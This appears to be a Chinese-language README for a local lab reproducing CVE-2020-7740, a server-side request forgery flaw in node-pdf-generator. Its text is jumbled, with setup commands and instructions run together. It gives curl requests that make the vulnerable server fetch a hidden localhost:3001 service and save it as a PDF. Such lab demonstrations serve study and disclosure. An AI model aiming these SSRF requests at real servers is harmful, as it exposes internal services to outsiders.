此漏洞影响所有版本的包 node-pdf-generator。由于缺乏对提供给 node-pdf-generator 内容的用户输入验证和清理,攻击者可以构造一个 URL 传递给外部服务器,从而实现 SSRF 攻击。
docker run -p 3000:3000 cve-2020-7740localhost:3001curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf 以查看本应隐藏的本地主机网站。git clone {link to be inserted} 克隆项目。https://wkhtmltopdf.org/ 安装依赖。node .\NodePdfGeneratorServer 启动服务器,服务器将在 localhost:3000 运行。python3 -m pip install -r requirements.txt 安装隐藏的 Python 服务器的依赖。python3 HiddenService 启动隐藏服务器,服务器将在 localhost:3001 运行。curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com 的 HTML 页面副本保存到文件 test.pdf 中。